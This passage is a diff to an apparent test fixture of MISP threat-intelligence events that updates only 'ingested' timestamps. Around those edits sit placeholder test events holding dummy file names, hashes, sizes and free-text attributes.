3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266267\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"fullpath\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"ff97cc32-815e-4fc9-9d4b-cab9822027a6\",\"value\":\"\\\\the\\\\fullpath\\\\to the file\\\\filenameofobject.txt\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", @@ -536,7 +536,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827814265Z", + "ingested": "2021-12-09T13:49:02.948949700Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266268\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"size-in-bytes\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":false,\"type\":\"size-in-bytes\",\"uuid\":\"e378b4d9-43e1-4c64-bd4e-70fce2b4e581\",\"value\":\"505050\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", @@ -631,7 +631,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827820827Z", + "ingested": "2021-12-09T13:49:02.948954300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266264\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"md5\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"787b3822-0bec-4278-b34a-5d649e7bce05\",\"value\":\"70461da8b94c6ca5d2fda3260c5a8c3b\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", @@ -726,7 +726,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827827380Z", + "ingested": "2021-12-09T13:49:02.948958900Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266265\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"sha256\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":true,\"type\":\"sha256\",\"uuid\":\"657c5f2b-9d68-4ff7-a9ad-ab9e6a6c953e\",\"value\":\"f33c27745f2bd87344be790465ef984a972fd539dc83bd4f61d4242c607ef1ee\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", @@ -819,7 +819,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827833501Z", + "ingested": "2021-12-09T13:49:02.948964600Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266266\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"6648d129-9200-431b-9b41-263a84f7c9d2\",\"value\":\"filenameofobject.txt\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", @@ -892,7 +892,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827856424Z", + "ingested": "2021-12-09T13:49:02.948969200Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"266269\",\"last_seen\":null,\"object_id\":\"18208\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621591770\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"25d2f181-26ae-4d6f-b4fd-85b9d1f82e67\",\"value\":\"Free text in the file object\"},\"ObjectReference\":[],\"comment\":\"File object for test event 4 \",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"18208\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621591770\",\"uuid\":\"190c762c-a389-4ecc-8f6e-68f92d42adef\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"3\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3634\",\"info\":\"Test event 4 with object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1621591770\",\"uuid\":\"d98a8418-9f90-4b50-a623-6921ca5b356d\"}}", "category": "threat", "type": "indicator", @@ -969,7 +969,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827866483Z", + "ingested": "2021-12-09T13:49:02.948974200Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"266270\",\"last_seen\":null,\"object_id\":\"18208\",\"object_relation\":\"sha256\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621591770\",\"to_ids\":true,\"type\":\"sha256\",\"uuid\":\"4e579782-346b-44b3-b72c-1cae8d87cb25\",\"value\":\"567caa7653723f8818ec9eb6f2e27f6d9d8c0aca0c96fc457659340e7bbdc666\"},\"ObjectReference\":[],\"comment\":\"File object for test event 4 \",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"18208\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621591770\",\"uuid\":\"190c762c-a389-4ecc-8f6e-68f92d42adef\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"3\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3634\",\"info\":\"Test event 4 with object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1621591770\",\"uuid\":\"d98a8418-9f90-4b50-a623-6921ca5b356d\"}}", "category": "threat", "type": "indicator", @@ -1044,7 +1044,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827873576Z", + "ingested": "2021-12-09T13:49:02.948980Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"266271\",\"last_seen\":null,\"object_id\":\"18208\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621591770\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"a40343b5-a480-4288-9b0c-7ae074a77140\",\"value\":\"filenameinmispobject.txt\"},\"ObjectReference\":[],\"comment\":\"File object for test event 4 \",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"18208\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621591770\",\"uuid\":\"190c762c-a389-4ecc-8f6e-68f92d42adef\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"3\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3634\",\"info\":\"Test event 4 with object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1621591770\",\"uuid\":\"d98a8418-9f90-4b50-a623-6921ca5b356d\"}}", "category": "threat", "type": "indicator", @@ -1117,7 +1117,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827879998Z", + "ingested": "2021-12-09T13:49:02.948985800Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266272\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"188a6a15-5704-4e4f-acba-22c55ab08fe8\",\"value\":\"Object 5 free text attribute in object\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": "indicator", @@ -1190,7 +1190,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827886230Z", + "ingested": "2021-12-09T13:49:02.948991500Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266275\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"entropy\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":false,\"type\":\"float\",\"uuid\":\"2400b103-4a33-4f92-ac04-a558b6c6e252\",\"value\":\"0.53535445\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": "indicator", @@ -1263,7 +1263,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827892031Z", + "ingested": "2021-12-09T13:49:02.948997100Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266276\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"size-in-bytes\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":false,\"type\":\"size-in-bytes\",\"uuid\":\"e5ea3ec0-cdf4-4d3e-bd66-a7bf384fd3d7\",\"value\":\"55555\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with 